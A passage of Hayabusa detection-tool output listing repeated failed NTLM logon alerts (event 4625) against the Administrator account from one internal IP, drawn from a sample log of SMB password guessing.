01:50:48.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h17Fz1s6GJki61jg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Pjjn4FAkJn4h32r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.483 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ARVx3FAAww8Gmfvc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sYIwPg5k1wpvWobN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0sfhYQ54SjC4JTX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nfZYnUPV40FShcqt : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XYbvWVCT0tFixZTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XC6Vmz0ql8myDuGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PJ8JvuvZZzwSOzFo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s06yKaogI6FYkXla : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pCjOc7PguxwNKoQR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:48.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BX5IosnpdYZK5xZj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfMjB1epEm64wVEX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pb4FVO2SKsoMyt1K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.003 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1qoRw2jjFx4F6Wx6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ImiLeiteLoSw32I0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KcIYD47BIEP8gB0L : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lUAeB15aWamcaZ8L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KFOKiSDWc1dWjzge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hqyMtzjKSJEtEAdx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtHsItpyFHQxvLWm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.287 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RdGMqIhUGHj23Xm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:49.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfE5LVmrPaAFLwBR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1swKSla5gkdOwxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kL9MdVnRVogiP7hF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aQ0hRdwZvC5PBcXl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ctbv73J0Dot9raD0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wKpWApJIKkjbtaPB : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kVTAv9VoNpUyxQFM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.642 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xb3t1dpuk9JZri5p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fy0UrW8TWrxAOX90 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iUXUbUsiE6Ahh9iD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2QQdQ6rQYLBf15AF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:49.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zG4eJLuQ4u2dKQG0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.854 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCfwHs2gVGiRc3Fy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 67TcwQfTxgTtQvCU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: imnSPKAKYzrCKSUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mMNbdjiXNUY0gTfB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zOAH0gjfs8JcXSMO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TnnB4KPBiDvKMsUL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aZRgpa5riqIEWhQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BBL4nrs7f6cjlfsT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.247 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fgDupzqipe5jK0r5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5yPcTOWPuN8efJtl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:50.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dszb6s0w6glvSkSw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ynu936pVVAuDUGT5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c55o3Dca2tiUVwb2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tnDmp2KK02LyJ7Xm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRUKrHDAmgEPcjQw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PCGKDvPhzg6BlsuU : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OU28biGLJkFmB117 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 029LphuWcoo9S2hL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ItIROqP2wyzLJa9s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XngGun3HYopTkcrA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c91Qz5QNUczcm7m6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:50.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7nyWJJJhDiqnf1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bnj7hAp20gZE9FCe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FydQjBxO7XninU5Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3P8InIzyD86BXr1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wvKGa3A3qw7s0cZX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QTY7tRVEMjXZXFyH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m4Ij1NSYGYbq4PxS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 47fOxZAYhjxLzEoU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aGxXaNNChVScbHe6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jTcVeB8f2Rs3Bldo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeSnUlIbuDVNffey : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:51.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eXIM4tWru1x0AahJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.379 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m2pBLn6aO8L4kiH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EG5daDsgTMZsNg0T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.492 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3V8z6j7GLO3ywBXc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AsezMvhUNedLNqg4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h16AvUVZG8qch7LC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PB5xe3Aieya8N3IU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.765 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ezGXIhYrkk2Q9pe5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VSGIVhD6pO5z47DY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.862 